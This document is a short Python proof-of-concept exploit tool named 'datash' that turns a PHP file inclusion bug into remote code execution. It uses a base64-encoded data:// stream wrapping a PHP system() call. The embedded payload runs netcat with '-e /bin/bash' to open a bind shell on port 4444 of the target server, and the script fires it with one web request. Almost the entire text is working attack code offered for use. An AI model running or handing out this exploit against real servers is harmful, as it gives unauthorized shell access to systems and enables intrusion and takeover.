This is a small proof of concept tool that leverages the data:// stream to gain remote code execution from a file inclusion vulnerability.
c8c8bbfa963434111dffb850c77790720a4f7b2c74f7310ff876ccea44eb66f6
#!/usr/bin/python
# datash v0.1
# Uses PHP's data:// stream for RCE
# For abusing File Inclusion Bugs.
# Author: Darren 'infodox' Martyn
# Site: insecurety.net
# Twatter: @info_dox
import sys
import requests
def banner():
print """
data shell
datash v0.1 - Insecurety Research
Abuses PHP's data:// stream to execute remote code on servers which are
1. Vulnerable to File Inclusion
2. Allowing data:// to be included
Reliable enough...
~ infodox
"""
if len(sys.argv) != 2:
banner()
print "Usage: ./datash.py <target url>"
print "Example: ./datash.py http://localhost/include.php?hax="
sys.exit(1)
targeturl = sys.argv[1]
payload = """nc -lvp 4444 -e /bin/bash &""" # FIXME - Multiple payloads later ;) This is just PoC
phpwrapper = """<?php system('%s'); ?>""" %(payload) # FIXME - Allow multiple PHP wrappers... Later!
encodedphp = phpwrapper.encode('base64') # Base64 encode the php wrapper with the payload in it
inject = """data://text/plain;base64,%s""" %(encodedphp) # This is the data:// injecty thingy :3
print "[+] Target Host: %s" %(targeturl)
print "[*] Popping Shell on 4444... Use netcat to connect..."
hack = targeturl+inject
requests.get(hack) # Like my terrible variable names and use of Requests? You better!
print "[:>] Hope you had fun ;)"